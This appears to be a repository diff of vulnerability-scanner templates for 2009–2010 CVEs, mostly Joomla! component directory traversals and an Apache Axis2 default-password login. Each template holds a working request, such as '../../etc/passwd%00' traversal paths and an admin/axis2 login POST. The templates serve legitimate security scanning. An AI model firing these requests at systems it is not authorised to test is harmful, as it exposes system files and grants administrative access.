description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference:
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
- http://websecurity.com.ua/2628/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
- http://secunia.com/advisories/37896
- http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -0,0 +1,53 @@
id: CVE-2010-0219
info:
name: Apache Axis2 Default Login
author: pikpikcu
severity: high
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- http://www.vupen.com/english/advisories/2010/2673
classification:
cve-id: CVE-2010-0219
metadata:
shodan-query: http.html:"Apache Axis"
tags: cve,cve2010,axis,apache,default-login,axis2
requests:
- raw:
- |
POST /axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginUsername={{username}}&loginPassword={{password}}
- |
POST /axis2/axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName={{username}}&password={{password}}&submit=+Login+
payloads:
username:
- admin
password:
- axis2
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/02

View File

@ -4,29 +4,30 @@ info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference:
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
- http://www.securityfocus.com/bid/37987
- http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
remediation: Apply all relevant security patches and upgrades.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.80
cvss-score: 5.8
cve-id: CVE-2010-0467
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,27 +1,31 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
- http://secunia.com/advisories/38587
- http://www.joomlaworks.gr/content/view/77/34/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
- http://secunia.com/advisories/38637
- http://www.securityfocus.com/bid/38296
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0759
tags: cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -8,20 +8,22 @@ info:
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
- http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference:
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
- http://www.securityfocus.com/bid/37692
- http://secunia.com/advisories/33486
classification:
cve-id: CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/30

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
- http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
- http://www.exploit-db.com/exploits/11088
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0944
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,26 @@ info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
- http://secunia.com/advisories/38925
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
- http://www.securityfocus.com/bid/37581
- http://secunia.com/advisories/37917
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component com_abbrev - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10948
- https://www.cvedetails.com/cve/CVE-2010-0985
- http://www.securityfocus.com/bid/37560
- http://osvdb.org/61458
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0985
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
- http://www.securityfocus.com/bid/38741
- http://secunia.com/advisories/38982
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
- http://osvdb.org/62506
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
- http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
- http://www.securityfocus.com/bid/38866
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1217
tags: cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,26 +1,30 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
- http://secunia.com/advisories/38952
- http://www.securityfocus.com/bid/38746
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1219
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
- http://www.securityfocus.com/bid/39108
- http://secunia.com/advisories/39200
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1302
tags: cve,cve2010,joomla,lfi,graph
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,26 @@ info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
- http://www.securityfocus.com/bid/39174
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1304
tags: cve,cve2010,joomla,lfi,status
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
- http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
- http://secunia.com/advisories/39351
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1305
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
- http://secunia.com/advisories/39338
- http://www.securityfocus.com/bid/39200
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
- http://secunia.com/advisories/39348
- http://www.vupen.com/english/advisories/2010/0806
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1307
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,26 @@ info:
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12066
- https://www.cvedetails.com/cve/CVE-2010-1308
- http://www.vupen.com/english/advisories/2010/0809
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1308
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
- http://secunia.com/advisories/39289
- http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1312
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,26 @@ info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
- http://www.securityfocus.com/bid/39237
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1313
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,27 @@ info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
- http://secunia.com/advisories/39359
- http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1314
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

Some files were not shown because too many files have changed in this diff Show More